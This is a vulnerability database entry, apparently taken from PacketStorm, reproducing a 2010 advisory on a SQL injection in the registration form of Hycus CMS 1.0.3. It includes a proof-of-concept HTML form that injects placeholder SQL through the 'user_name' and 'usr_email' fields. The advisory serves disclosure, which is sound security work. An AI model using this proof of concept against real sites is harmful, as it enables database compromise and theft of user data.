ID
VAR-E-201012-0168
TITLE
Hycus CMS 1.0.3 SQL Injection
Trust: 0.5
DESCRIPTION
Hycus CMS version 1.0.3 suffers from a remote SQL injection vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | hycus | model: | cms | scope: | eq | version: | 1.0.3 | Trust: 0.5 |
EXPLOIT
Vulnerability ID: HTB22738
Reference: http://www.htbridge.ch/advisory/sql_injection_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: SQL injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "user_name" and "usr_email" variables.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
The following PoC is available:
<form action="http://[host]/?user/1/hregister.html" method="post" name="main" >
<input type="hidden" name="full_name" value="username"/>
<input type="hidden" name="user_name" value="1'SQL_CODE"/>
<input type="hidden" name="usr_email" value="test@mail.com'SQL_CODE"/>
<input type="hidden" name="pwd" value="123456"/>
<input type="hidden" name="pwd2" value="123456"/>
<input type="submit" value="submit" name="submit" />
</form>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
sql injection
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | sql injection | Trust: 0.5 |
CREDITS
High-Tech Bridge SA
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 96940 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 96940 |
LAST UPDATE DATE
2022-07-27T09:30:36.479000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 96940 | date: | 2010-12-22T05:17:11 |